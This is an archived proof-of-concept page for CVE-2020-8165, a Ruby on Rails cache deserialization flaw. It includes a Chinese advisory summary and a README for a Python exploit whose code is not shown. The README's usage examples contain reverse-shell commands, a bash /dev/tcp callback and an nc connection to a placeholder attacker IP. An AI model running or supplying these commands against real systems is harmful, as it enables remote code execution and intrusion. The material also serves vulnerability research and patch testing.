CVE-2020-8165 PoC — Ruby on Rails 代码问题漏洞

Source

https://github.com/hybryx/CVE-2020-8165

Associated Vulnerability

Title:Ruby on Rails 代码问题漏洞 (CVE-2020-8165)
Description:Ruby on Rails是Rails团队的一套基于Ruby语言的开源Web应用框架。 Ruby on Rails 5.2.5之前版本和6.0.4之前版本中存在代码问题漏洞。攻击者可利用该漏洞将不受信任的Ruby对象注入到Web应用程序，执行代码或造成其他危害。

Readme

# CVE-2020-8165 Python Exploit

This is code to exploit CVE-2020-8165 using Python3. This exploit works with rails < 5.2.4.3, rails < 6.0.3.1. The exploit allows an attacker to unmarshal user-provided objects in MemCacheStore and RedisCacheStore. This exploit code uses ArgParse to allow the user to very simply exploit this vulnerability. 

## Usage
There are five arguments for this exploit: 
  * rHost - The remote, target, hosts IP address
  * rPort - The remote, target, hosts port num that Rails in running on
  * email - The email that is used to login to the service
  * password - The password to the account to login to the service
  * cmd - The command to run, in quotes to account for spaces
  
Examples:
  * python3 exploit.py 10.10.10.X 8080 user@domain.com password "bash -c 'bash -i >& /dev/tcp/10.10.X.X/8989 0>&1'"
  * python3 exploit.py 10.10.10.X 8080 user@domain.com password "nc 10.10.X.X 8989"

## Major Credits
Original CVE details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165
Pastebin exploit code that I touched up and added arg parse: https://pastebin.com/jpHpdBTk

File Snapshot


 [4.0K]  /data/pocs/bde93cce8fac0b5f4ee79924b7306c59cfbde417
├── [2.0K]  exploit.py
└── [1.1K]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!